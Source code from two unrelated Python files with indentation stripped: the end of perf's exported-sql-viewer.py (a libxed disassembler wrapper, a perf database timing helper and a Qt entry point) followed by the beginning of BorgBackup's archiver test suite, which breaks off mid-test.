self.xed_format_context.argtypes = [ c_int, c_void_p, c_void_p, c_int, c_ulonglong, c_void_p, c_void_p ]
self.xed_tables_init()
def Instruction(self):
return XEDInstruction(self)
def SetMode(self, inst, mode):
if mode:
inst.state.mode = 4 # 32-bit
inst.state.width = 4 # 4 bytes
else:
inst.state.mode = 1 # 64-bit
inst.state.width = 8 # 8 bytes
self.xed_operand_values_set_mode(inst.xedp, inst.statep)
def DisassembleOne(self, inst, bytes_ptr, bytes_cnt, ip):
self.xed_decoded_inst_zero_keep_mode(inst.xedp)
err = self.xed_decode(inst.xedp, bytes_ptr, bytes_cnt)
if err:
return 0, ""
# Use AT&T mode (2), alternative is Intel (3)
ok = self.xed_format_context(2, inst.xedp, inst.bufferp, sizeof(inst.buffer), ip, 0, 0)
if not ok:
return 0, ""
if sys.version_info[0] == 2:
result = inst.buffer.value
else:
result = inst.buffer.value.decode()
# Return instruction length and the disassembled instruction text
# For now, assume the length is in byte 166
return inst.xedd[166], result
def TryOpen(file_name):
try:
return open(file_name, "rb")
except:
return None
def Is64Bit(f):
result = sizeof(c_void_p)
# ELF support only
pos = f.tell()
f.seek(0)
header = f.read(7)
f.seek(pos)
magic = header[0:4]
if sys.version_info[0] == 2:
eclass = ord(header[4])
encoding = ord(header[5])
version = ord(header[6])
else:
eclass = header[4]
encoding = header[5]
version = header[6]
if magic == chr(127) + "ELF" and eclass > 0 and eclass < 3 and encoding > 0 and encoding < 3 and version == 1:
result = True if eclass == 2 else False
return result
# Global data
class Glb():
def __init__(self, dbref, db, dbname):
self.dbref = dbref
self.db = db
self.dbname = dbname
self.home_dir = os.path.expanduser("~")
self.buildid_dir = os.getenv("PERF_BUILDID_DIR")
if self.buildid_dir:
self.buildid_dir += "/.build-id/"
else:
self.buildid_dir = self.home_dir + "/.debug/.build-id/"
self.app = None
self.mainwindow = None
self.instances_to_shutdown_on_exit = weakref.WeakSet()
try:
self.disassembler = LibXED()
self.have_disassembler = True
except:
self.have_disassembler = False
self.host_machine_id = 0
self.host_start_time = 0
self.host_finish_time = 0
def FileFromBuildId(self, build_id):
file_name = self.buildid_dir + build_id[0:2] + "/" + build_id[2:] + "/elf"
return TryOpen(file_name)
def FileFromNamesAndBuildId(self, short_name, long_name, build_id):
# Assume current machine i.e. no support for virtualization
if short_name[0:7] == "[kernel" and os.path.basename(long_name) == "kcore":
file_name = os.getenv("PERF_KCORE")
f = TryOpen(file_name) if file_name else None
if f:
return f
# For now, no special handling if long_name is /proc/kcore
f = TryOpen(long_name)
if f:
return f
f = self.FileFromBuildId(build_id)
if f:
return f
return None
def AddInstanceToShutdownOnExit(self, instance):
self.instances_to_shutdown_on_exit.add(instance)
# Shutdown any background processes or threads
def ShutdownInstances(self):
for x in self.instances_to_shutdown_on_exit:
try:
x.Shutdown()
except:
pass
def GetHostMachineId(self):
query = QSqlQuery(self.db)
QueryExec(query, "SELECT id FROM machines WHERE pid = -1")
if query.next():
self.host_machine_id = query.value(0)
else:
self.host_machine_id = 0
return self.host_machine_id
def HostMachineId(self):
if self.host_machine_id:
return self.host_machine_id
return self.GetHostMachineId()
def SelectValue(self, sql):
query = QSqlQuery(self.db)
try:
QueryExec(query, sql)
except:
return None
if query.next():
return Decimal(query.value(0))
return None
def SwitchesMinTime(self, machine_id):
return self.SelectValue("SELECT time"
" FROM context_switches"
" WHERE time != 0 AND machine_id = " + str(machine_id) +
" ORDER BY id LIMIT 1")
def SwitchesMaxTime(self, machine_id):
return self.SelectValue("SELECT time"
" FROM context_switches"
" WHERE time != 0 AND machine_id = " + str(machine_id) +
" ORDER BY id DESC LIMIT 1")
def SamplesMinTime(self, machine_id):
return self.SelectValue("SELECT time"
" FROM samples"
" WHERE time != 0 AND machine_id = " + str(machine_id) +
" ORDER BY id LIMIT 1")
def SamplesMaxTime(self, machine_id):
return self.SelectValue("SELECT time"
" FROM samples"
" WHERE time != 0 AND machine_id = " + str(machine_id) +
" ORDER BY id DESC LIMIT 1")
def CallsMinTime(self, machine_id):
return self.SelectValue("SELECT calls.call_time"
" FROM calls"
" INNER JOIN threads ON threads.thread_id = calls.thread_id"
" WHERE calls.call_time != 0 AND threads.machine_id = " + str(machine_id) +
" ORDER BY calls.id LIMIT 1")
def CallsMaxTime(self, machine_id):
return self.SelectValue("SELECT calls.return_time"
" FROM calls"
" INNER JOIN threads ON threads.thread_id = calls.thread_id"
" WHERE calls.return_time != 0 AND threads.machine_id = " + str(machine_id) +
" ORDER BY calls.return_time DESC LIMIT 1")
def GetStartTime(self, machine_id):
t0 = self.SwitchesMinTime(machine_id)
t1 = self.SamplesMinTime(machine_id)
t2 = self.CallsMinTime(machine_id)
if t0 is None or (not(t1 is None) and t1 < t0):
t0 = t1
if t0 is None or (not(t2 is None) and t2 < t0):
t0 = t2
return t0
def GetFinishTime(self, machine_id):
t0 = self.SwitchesMaxTime(machine_id)
t1 = self.SamplesMaxTime(machine_id)
t2 = self.CallsMaxTime(machine_id)
if t0 is None or (not(t1 is None) and t1 > t0):
t0 = t1
if t0 is None or (not(t2 is None) and t2 > t0):
t0 = t2
return t0
def HostStartTime(self):
if self.host_start_time:
return self.host_start_time
self.host_start_time = self.GetStartTime(self.HostMachineId())
return self.host_start_time
def HostFinishTime(self):
if self.host_finish_time:
return self.host_finish_time
self.host_finish_time = self.GetFinishTime(self.HostMachineId())
return self.host_finish_time
def StartTime(self, machine_id):
if machine_id == self.HostMachineId():
return self.HostStartTime()
return self.GetStartTime(machine_id)
def FinishTime(self, machine_id):
if machine_id == self.HostMachineId():
return self.HostFinishTime()
return self.GetFinishTime(machine_id)
# Database reference
class DBRef():
def __init__(self, is_sqlite3, dbname):
self.is_sqlite3 = is_sqlite3
self.dbname = dbname
self.TRUE = "TRUE"
self.FALSE = "FALSE"
# SQLite prior to version 3.23 does not support TRUE and FALSE
if self.is_sqlite3:
self.TRUE = "1"
self.FALSE = "0"
def Open(self, connection_name):
dbname = self.dbname
if self.is_sqlite3:
db = QSqlDatabase.addDatabase("QSQLITE", connection_name)
else:
db = QSqlDatabase.addDatabase("QPSQL", connection_name)
opts = dbname.split()
for opt in opts:
if "=" in opt:
opt = opt.split("=")
if opt[0] == "hostname":
db.setHostName(opt[1])
elif opt[0] == "port":
db.setPort(int(opt[1]))
elif opt[0] == "username":
db.setUserName(opt[1])
elif opt[0] == "password":
db.setPassword(opt[1])
elif opt[0] == "dbname":
dbname = opt[1]
else:
dbname = opt
db.setDatabaseName(dbname)
if not db.open():
raise Exception("Failed to open database " + dbname + " error: " + db.lastError().text())
return db, dbname
# Main
def Main():
usage_str = "exported-sql-viewer.py [--pyside-version-1] <database name>\n" \
" or: exported-sql-viewer.py --help-only"
ap = argparse.ArgumentParser(usage = usage_str, add_help = False)
ap.add_argument("--pyside-version-1", action='store_true')
ap.add_argument("dbname", nargs="?")
ap.add_argument("--help-only", action='store_true')
args = ap.parse_args()
if args.help_only:
app = QApplication(sys.argv)
mainwindow = HelpOnlyWindow()
mainwindow.show()
err = app.exec_()
sys.exit(err)
dbname = args.dbname
if dbname is None:
ap.print_usage()
print("Too few arguments")
sys.exit(1)
is_sqlite3 = False
try:
f = open(dbname, "rb")
if f.read(15) == b'SQLite format 3':
is_sqlite3 = True
f.close()
except:
pass
dbref = DBRef(is_sqlite3, dbname)
db, dbname = dbref.Open("main")
glb = Glb(dbref, db, dbname)
app = QApplication(sys.argv)
glb.app = app
mainwindow = MainWindow(glb)
glb.mainwindow = mainwindow
mainwindow.show()
err = app.exec_()
glb.ShutdownInstances()
db.close()
sys.exit(err)
if __name__ == "__main__":
Main()
|
archiver.py
|
import argparse
import dateutil.tz
import errno
import io
import json
import logging
import os
import pstats
import random
import re
import shutil
import socket
import stat
import subprocess
import sys
import tempfile
import time
import unittest
from binascii import unhexlify, b2a_base64
from configparser import ConfigParser
from datetime import datetime
from datetime import timezone
from datetime import timedelta
from hashlib import sha256
from io import BytesIO, StringIO
from unittest.mock import patch
import pytest
import borg
from .. import xattr, helpers, platform
from ..archive import Archive, ChunkBuffer
from ..archiver import Archiver, parse_storage_quota, PURE_PYTHON_MSGPACK_WARNING
from ..cache import Cache, LocalCache
from ..chunker import has_seek_hole
from ..constants import * # NOQA
from ..crypto.low_level import bytes_to_long, num_cipher_blocks
from ..crypto.key import KeyfileKeyBase, RepoKey, KeyfileKey, Passphrase, TAMRequiredError
from ..crypto.keymanager import RepoIdMismatch, NotABorgKeyFile
from ..crypto.file_integrity import FileIntegrityError
from ..helpers import Location, get_security_dir
from ..helpers import Manifest, MandatoryFeatureUnsupported
from ..helpers import EXIT_SUCCESS, EXIT_WARNING, EXIT_ERROR
from ..helpers import bin_to_hex
from ..helpers import MAX_S
from ..helpers import msgpack
from ..helpers import flags_noatime, flags_normal
from ..nanorst import RstToTextLazy, rst_to_terminal
from ..patterns import IECommand, PatternMatcher, parse_pattern
from ..item import Item, ItemDiff
from ..locking import LockFailed
from ..logger import setup_logging
from ..remote import RemoteRepository, PathNotAllowed
from ..repository import Repository
from . import has_lchflags, llfuse
from . import BaseTestCase, changedir, environment_variable, no_selinux
from . import are_symlinks_supported, are_hardlinks_supported, are_fifos_supported, is_utime_fully_supported, is_birthtime_fully_supported
from .platform import fakeroot_detected
from .upgrader import make_attic_repo
from . import key
src_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def exec_cmd(*args, archiver=None, fork=False, exe=None, input=b'', binary_output=False, **kw):
if fork:
try:
if exe is None:
borg = (sys.executable, '-m', 'borg.archiver')
elif isinstance(exe, str):
borg = (exe, )
elif not isinstance(exe, tuple):
raise ValueError('exe must be None, a tuple or a str')
output = subprocess.check_output(borg + args, stderr=subprocess.STDOUT, input=input)
ret = 0
except subprocess.CalledProcessError as e:
output = e.output
ret = e.returncode
except SystemExit as e: # possibly raised by argparse
output = ''
ret = e.code
if binary_output:
return ret, output
else:
return ret, os.fsdecode(output)
else:
stdin, stdout, stderr = sys.stdin, sys.stdout, sys.stderr
try:
sys.stdin = StringIO(input.decode())
sys.stdin.buffer = BytesIO(input)
output = BytesIO()
# Always use utf-8 here, to simply .decode() below
output_text = sys.stdout = sys.stderr = io.TextIOWrapper(output, encoding='utf-8')
if archiver is None:
archiver = Archiver()
archiver.prerun_checks = lambda *args: None
archiver.exit_code = EXIT_SUCCESS
helpers.exit_code = EXIT_SUCCESS
try:
args = archiver.parse_args(list(args))
# argparse parsing may raise SystemExit when the command line is bad or
# actions that abort early (eg. --help) where given. Catch this and return
# the error code as-if we invoked a Borg binary.
except SystemExit as e:
output_text.flush()
return e.code, output.getvalue() if binary_output else output.getvalue().decode()
ret = archiver.run(args)
output_text.flush()
return ret, output.getvalue() if binary_output else output.getvalue().decode()
finally:
sys.stdin, sys.stdout, sys.stderr = stdin, stdout, stderr
def have_gnutar():
if not shutil.which('tar'):
return False
popen = subprocess.Popen(['tar', '--version'], stdout=subprocess.PIPE)
stdout, stderr = popen.communicate()
return b'GNU tar' in stdout
# check if the binary "borg.exe" is available (for local testing a symlink to virtualenv/bin/borg should do)
try:
exec_cmd('help', exe='borg.exe', fork=True)
BORG_EXES = ['python', 'binary', ]
except FileNotFoundError:
BORG_EXES = ['python', ]
@pytest.fixture(params=BORG_EXES)
def cmd(request):
if request.param == 'python':
exe = None
elif request.param == 'binary':
exe = 'borg.exe'
else:
raise ValueError("param must be 'python' or 'binary'")
def exec_fn(*args, **kw):
return exec_cmd(*args, exe=exe, fork=True, **kw)
return exec_fn
def test_return_codes(cmd, tmpdir):
repo = tmpdir.mkdir('repo')
input = tmpdir.mkdir('input')
output = tmpdir.mkdir('output')
input.join('test_file').write('content')
rc, out = cmd('init', '--encryption=none', '%s' % str(repo))
assert rc == EXIT_SUCCESS
rc, out = cmd('create', '%s::archive' % repo, str(input))
assert rc == EXIT_SUCCESS
with changedir(str(output)):
rc, out = cmd('extract', '%s::archive' % repo)
assert rc == EXIT_SUCCESS
rc, out = cmd('extract', '%s::archive' % repo, 'does/not/match')
assert rc == EXIT_WARNING # pattern did not match
rc, out = cmd('create', '%s::archive' % repo, str(input))
assert rc == EXIT_ERROR # duplicate archive name
"""
test_disk_full is very slow and not recommended to be included in daily testing.
for this test, an empty, writable 16MB filesystem mounted on DF_MOUNT is required.
for speed and other reasons, it is recommended that the underlying block device is
in RAM, not a magnetic or flash disk.
assuming /tmp is a tmpfs (in memory filesystem), one can use this:
dd if=/dev/zero of=/tmp/borg-disk bs=16M count=1
mkfs.ext4 /tmp/borg-disk
mkdir /tmp/borg-mount
sudo mount /tmp/borg-disk /tmp/borg-mount
if the directory does not exist, the test will be skipped.
"""
DF_MOUNT = '/tmp/borg-mount'
@pytest.mark.skipif(not os.path.exists(DF_MOUNT), reason="needs a 16MB fs mounted on %s" % DF_MOUNT)
def test_disk_full(cmd):
def make_files(dir, count, size, rnd=True):
shutil.rmtree(dir, ignore_errors=True)
os.mkdir(dir)
if rnd:
count = random.randint(1, count)
if size > 1:
size = random.randint(1, size)
for i in range(count):
fn = os.path.join(dir, "file%03d" % i)
with open(fn, 'wb') as f:
data = os.urandom(size)
f.write(data)
with environment_variable(BORG_CHECK_I_KNOW_WHAT_I_AM_DOING='YES'):
mount = DF_MOUNT
assert os.path.exists(mount)
repo = os.path.join(mount, 'repo')
input = os.path.join(mount, 'input')
reserve = os.path.join(mount, 'reserve')
for j in range(100):
shutil.rmtree(repo, ignore_errors=True)
shutil.rmtree(input, ignore_errors=True)
# keep some space and some inodes in reserve that we can free up later:
make_files(reserve, 80, 100000, rnd=False)
rc, out = cmd('init', repo)
if rc != EXIT_SUCCESS:
print('init', rc, out)
assert rc == EXIT_SUCCESS
try:
success, i = True, 0
while success:
i += 1
try:
make_files(input, 20, 200000)
except OSError as err:
if err.errno == errno.ENOSPC:
# already out of space
break
raise
try:
rc, out = cmd('create', '%s::test%03d' % (repo, i), input)
success = rc == EXIT_SUCCESS
if not success:
print('create', rc, out)
finally:
# make sure repo is not locked
shutil.rmtree(os.path.join(repo, 'lock.exclusive'), ignore_errors=True)
os.remove(os.path.join(repo, 'lock.roster'))
finally:
# now some error happened, likely we are out of disk space.
# free some space so we can expect borg to be able to work normally:
shutil.rmtree(reserve, ignore_errors=True)
rc, out = cmd('list', repo)
if rc != EXIT_SUCCESS:
print('list', rc, out)
rc, out = cmd('check', '--repair', repo)
if rc != EXIT_SUCCESS:
print('check', rc, out)
assert rc == EXIT_SUCCESS
class ArchiverTestCaseBase(BaseTestCase):
EXE = None # python source based
FORK_DEFAULT = False
prefix = ''
def setUp(self):
os.environ['BORG_CHECK_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_PASSPHRASE'] = 'waytooeasyonlyfortests'
self.archiver = not self.FORK_DEFAULT and Archiver() or None
self.tmpdir = tempfile.mkdtemp()
self.repository_path = os.path.join(self.tmpdir, 'repository')
self.repository_location = self.prefix + self.repository_path
self.input_path = os.path.join(self.tmpdir, 'input')
self.output_path = os.path.join(self.tmpdir, 'output')
self.keys_path = os.path.join(self.tmpdir, 'keys')
self.cache_path = os.path.join(self.tmpdir, 'cache')
self.exclude_file_path = os.path.join(self.tmpdir, 'excludes')
self.patterns_file_path = os.path.join(self.tmpdir, 'patterns')
os.environ['BORG_KEYS_DIR'] = self.keys_path
os.environ['BORG_CACHE_DIR'] = self.cache_path
os.mkdir(self.input_path)
os.chmod(self.input_path, 0o777) # avoid troubles with fakeroot / FUSE
os.mkdir(self.output_path)
os.mkdir(self.keys_path)
os.mkdir(self.cache_path)
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b'input/file2\n# A comment line, then a blank line\n\n')
with open(self.patterns_file_path, 'wb') as fd:
fd.write(b'+input/file_important\n- input/file*\n# A comment line, then a blank line\n\n')
self._old_wd = os.getcwd()
os.chdir(self.tmpdir)
def tearDown(self):
os.chdir(self._old_wd)
# note: ignore_errors=True as workaround for issue #862
shutil.rmtree(self.tmpdir, ignore_errors=True)
setup_logging()
def cmd(self, *args, **kw):
exit_code = kw.pop('exit_code', 0)
fork = kw.pop('fork', None)
binary_output = kw.get('binary_output', False)
if fork is None:
fork = self.FORK_DEFAULT
ret, output = exec_cmd(*args, fork=fork, exe=self.EXE, archiver=self.archiver, **kw)
if ret != exit_code:
print(output)
self.assert_equal(ret, exit_code)
# if tests are run with the pure-python msgpack, there will be warnings about
# this in the output, which would make a lot of tests fail.
pp_msg = PURE_PYTHON_MSGPACK_WARNING.encode() if binary_output else PURE_PYTHON_MSGPACK_WARNING
empty = b'' if binary_output else ''
output = empty.join(line for line in output.splitlines(keepends=True)
if pp_msg not in line)
return output
def create_src_archive(self, name):
self.cmd('create', '--compression=lz4', self.repository_location + '::' + name, src_dir)
def open_archive(self, name):
repository = Repository(self.repository_path, exclusive=True)
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, name)
return archive, repository
def open_repository(self):
return Repository(self.repository_path, exclusive=True)
def create_regular_file(self, name, size=0, contents=None):
assert not (size != 0 and contents and len(contents) != size), 'size and contents do not match'
filename = os.path.join(self.input_path, name)
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
with open(filename, 'wb') as fd:
if contents is None:
contents = b'X' * size
fd.write(contents)
def create_test_files(self):
"""Create a minimal test case including all supported file types
"""
# File
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('flagfile', size=1024)
# Directory
self.create_regular_file('dir2/file2', size=1024 * 80)
# File mode
os.chmod('input/file1', 0o4755)
# Hard link
if are_hardlinks_supported():
os.link(os.path.join(self.input_path, 'file1'),
os.path.join(self.input_path, 'hardlink'))
# Symlink
if are_symlinks_supported():
os.symlink('somewhere', os.path.join(self.input_path, 'link1'))
self.create_regular_file('fusexattr', size=1)
if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
fn = os.fsencode(os.path.join(self.input_path, 'fusexattr'))
# ironically, due to the way how fakeroot works, comparing FUSE file xattrs to orig file xattrs
# will FAIL if fakeroot supports xattrs, thus we only set the xattr if XATTR_FAKEROOT is False.
# This is because fakeroot with xattr-support does not propagate xattrs of the underlying file
# into "fakeroot space". Because the xattrs exposed by borgfs are these of an underlying file
# (from fakeroots point of view) they are invisible to the test process inside the fakeroot.
xattr.setxattr(fn, b'user.foo', b'bar')
xattr.setxattr(fn, b'user.empty', b'')
# XXX this always fails for me
# ubuntu 14.04, on a TMP dir filesystem with user_xattr, using fakeroot
# same for newer ubuntu and centos.
# if this is supported just on specific platform, platform should be checked first,
# so that the test setup for all tests using it does not fail here always for others.
# xattr.setxattr(os.path.join(self.input_path, 'link1'), b'user.foo_symlink', b'bar_symlink', follow_symlinks=False)
# FIFO node
if are_fifos_supported():
os.mkfifo(os.path.join(self.input_path, 'fifo1'))
if has_lchflags:
platform.set_flags(os.path.join(self.input_path, 'flagfile'), stat.UF_NODUMP)
try:
# Block device
os.mknod('input/bdev', 0o600 | stat.S_IFBLK, os.makedev(10, 20))
# Char device
os.mknod('input/cdev', 0o600 | stat.S_IFCHR, os.makedev(30, 40))
# File mode
os.chmod('input/dir2', 0o555) # if we take away write perms, we need root to remove contents
# File owner
os.chown('input/file1', 100, 200) # raises OSError invalid argument on cygwin
have_root = True # we have (fake)root
except PermissionError:
have_root = False
except OSError as e:
# Note: ENOSYS "Function not implemented" happens as non-root on Win 10 Linux Subsystem.
if e.errno not in (errno.EINVAL, errno.ENOSYS):
raise
have_root = False
time.sleep(1) # "empty" must have newer timestamp than other files
self.create_regular_file('empty', size=0)
return have_root
class ArchiverTestCase(ArchiverTestCaseBase):
requires_hardlinks = pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_basic_functionality(self):
have_root = self.create_test_files()
# fork required to test show-rc output
output = self.cmd('init', '--encryption=repokey', '--show-version', '--show-rc', self.repository_location, fork=True)
self.assert_in('borgbackup version', output)
self.assert_in('terminating with success status, rc 0', output)
self.cmd('create', '--exclude-nodump', self.repository_location + '::test', 'input')
output = self.cmd('create', '--exclude-nodump', '--stats', self.repository_location + '::test.2', 'input')
self.assert_in('Archive name: test.2', output)
self.assert_in('This archive: ', output)
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
list_output = self.cmd('list', '--short', self.repository_location)
self.assert_in('test', list_output)
self.assert_in('test.2', list_output)
expected = [
'input',
'input/bdev',
'input/cdev',
'input/dir2',
'input/dir2/file2',
'input/empty',
'input/file1',
'input/flagfile',
]
if are_fifos_supported():
expected.append('input/fifo1')
if are_symlinks_supported():
expected.append('input/link1')
if are_hardlinks_supported():
expected.append('input/hardlink')
if not have_root:
# we could not create these device files without (fake)root
expected.remove('input/bdev')
expected.remove('input/cdev')
if has_lchflags:
# remove the file we did not backup, so input and output become equal
expected.remove('input/flagfile') # this file is UF_NODUMP
os.remove(os.path.join('input', 'flagfile'))
list_output = self.cmd('list', '--short', self.repository_location + '::test')
for name in expected:
self.assert_in(name, list_output)
self.assert_dirs_equal('input', 'output/input')
info_output = self.cmd('info', self.repository_location + '::test')
item_count = 4 if has_lchflags else 5 # one file is UF_NODUMP
self.assert_in('Number of files: %d' % item_count, info_output)
shutil.rmtree(self.cache_path)
info_output2 = self.cmd('info', self.repository_location + '::test')
def filter(output):
# filter for interesting "info" output, ignore cache rebuilding related stuff
prefixes = ['Name:', 'Fingerprint:', 'Number of files:', 'This archive:',
'All archives:', 'Chunk index:', ]
result = []
for line in output.splitlines():
for prefix in prefixes:
if line.startswith(prefix):
result.append(line)
return '\n'.join(result)
# the interesting parts of info_output2 and info_output should be same
self.assert_equal(filter(info_output), filter(info_output2))
@requires_hardlinks
def test_create_duplicate_root(self):
# setup for #5603
path_a = os.path.join(self.input_path, 'a')
path_b = os.path.join(self.input_path, 'b')
os.mkdir(path_a)
os.mkdir(path_b)
hl_a = os.path.join(path_a, 'hardlink')
hl_b = os.path.join(path_b, 'hardlink')
self.create_regular_file(hl_a, contents=b'123456')
os.link(hl_a, hl_b)
self.cmd('init', '--encryption=none', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input') # give input twice!
# test if created archive has 'input' contents twice:
archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
# we have all fs items exactly once!
assert paths == ['input', 'input/a', 'input/a/hardlink', 'input/b', 'input/b/hardlink']
def test_init_parent_dirs(self):
parent_path = os.path.join(self.tmpdir, 'parent1', 'parent2')
repository_path = os.path.join(parent_path, 'repository')
repository_location = self.prefix + repository_path
with pytest.raises(Repository.ParentPathDoesNotExist):
# normal borg init does NOT create missing parent dirs
self.cmd('init', '--encryption=none', repository_location)
# but if told so, it does:
self.cmd('init', '--encryption=none', '--make-parent-dirs', repository_location)
assert os.path.exists(parent_path)
def test_unix_socket(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(os.path.join(self.input_path, 'unix-socket'))
except PermissionError as err:
if err.errno == errno.EPERM:
pytest.skip('unix sockets disabled or not supported')
elif err.errno == errno.EACCES:
pytest.skip('permission denied to create unix sockets')
self.cmd('create', self.repository_location + '::test', 'input')
sock.close()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert not os.path.exists('input/unix-socket')
@pytest.mark.skipif(not are_symlinks_supported(), reason='symlinks not supported')
def test_symlink_extract(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.readlink('input/link1') == 'somewhere'
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
def test_atime(self):
def has_noatime(some_file):
atime_before = os.stat(some_file).st_atime_ns
try:
with open(os.open(some_file, flags_noatime)) as file:
file.read()
except PermissionError:
return False
else:
atime_after = os.stat(some_file).st_atime_ns
noatime_used = flags_noatime != flags_normal
return noatime_used and atime_before == atime_after
self.create_test_files()
atime, mtime = 123456780, 234567890
have_noatime = has_noatime('input/file1')
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--atime', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
if have_noatime:
assert sti.st_atime_ns == sto.st_atime_ns == atime * 1e9
else:
# it touched the input file's atime while backing it up
assert sto.st_atime_ns == atime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_birthtime(self):
self.create_test_files()
birthtime, mtime, atime = 946598400, 946684800, 946771200
os.utime('input/file1', (atime, birthtime))
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert int(sti.st_birthtime * 1e9) == int(sto.st_birthtime * 1e9) == birthtime * 1e9
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_nobirthtime(self):
self.create_test_files()
birthtime, mtime, atime = 946598400, 946684800, 946771200
os.utime('input/file1', (atime, birthtime))
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--nobirthtime', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert int(sti.st_birthtime * 1e9) == birthtime * 1e9
assert int(sto.st_birthtime * 1e9) == mtime * 1e9
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
def _extract_repository_id(self, path):
with Repository(self.repository_path) as repository:
return repository.id
def _set_repository_id(self, path, id):
config = ConfigParser(interpolation=None)
config.read(os.path.join(path, 'config'))
config.set('repository', 'id', bin_to_hex(id))
with open(os.path.join(path, 'config'), 'w') as fd:
config.write(fd)
with Repository(self.repository_path) as repository:
return repository.id
def test_sparse_file(self):
def is_sparse(fn, total_size, hole_size):
st = os.stat(fn)
assert st.st_size == total_size
sparse = True
if sparse and hasattr(st, 'st_blocks') and st.st_blocks * 512 >= st.st_size:
sparse = False
if sparse and has_seek_hole:
with open(fn, 'rb') as fd:
# only check if the first hole is as expected, because the 2nd hole check
# is problematic on xfs due to its "dynamic speculative EOF preallocation
try:
if fd.seek(0, os.SEEK_HOLE) != 0:
sparse = False
if fd.seek(0, os.SEEK_DATA) != hole_size:
sparse = False
except OSError:
# OS/FS does not really support SEEK_HOLE/SEEK_DATA
sparse = False
return sparse
filename = os.path.join(self.input_path, 'sparse')
content = b'foobar'
hole_size = 5 * (1 << CHUNK_MAX_EXP) # 5 full chunker buffers
total_size = hole_size + len(content) + hole_size
with open(filename, 'wb') as fd:
# create a file that has a hole at the beginning and end (if the
# OS and filesystem supports sparse files)
fd.seek(hole_size, 1)
fd.write(content)
fd.seek(hole_size, 1)
pos = fd.tell()
fd.truncate(pos)
# we first check if we could create a sparse input file:
sparse_support = is_sparse(filename, total_size, hole_size)
if sparse_support:
# we could create a sparse input file, so creating a backup of it and
# extracting it again (as sparse) should also work:
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir(self.output_path):
self.cmd('extract', '--sparse', self.repository_location + '::test')
self.assert_dirs_equal('input', 'output/input')
filename = os.path.join(self.output_path, 'input', 'sparse')
with open(filename, 'rb') as fd:
# check if file contents are as expected
self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
self.assert_equal(fd.read(len(content)), content)
self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
self.assert_true(is_sparse(filename, total_size, hole_size))
def test_unusual_filenames(self):
filenames = ['normal', 'with some blanks', '(with_parens)', ]
for filename in filenames:
filename = os.path.join(self.input_path, filename)
with open(filename, 'wb'):
pass
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
for filename in filenames:
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', os.path.join('input', filename))
assert os.path.exists(os.path.join('output', 'input', filename))
def test_repository_swap_detection(self):
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = self._extract_repository_id(self.repository_path)
self.cmd('create', self.repository_location + '::test', 'input')
shutil.rmtree(self.repository_path)
self.cmd('init', '--encryption=none', self.repository_location)
self._set_repository_id(self.repository_path, repository_id)
self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.EncryptionMethodMismatch):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_swap_detection2(self):
self.create_test_files()
self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
self.cmd('create', self.repository_location + '_encrypted::test', 'input')
shutil.rmtree(self.repository_path + '_encrypted')
os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
if self.FORK_DEFAULT:
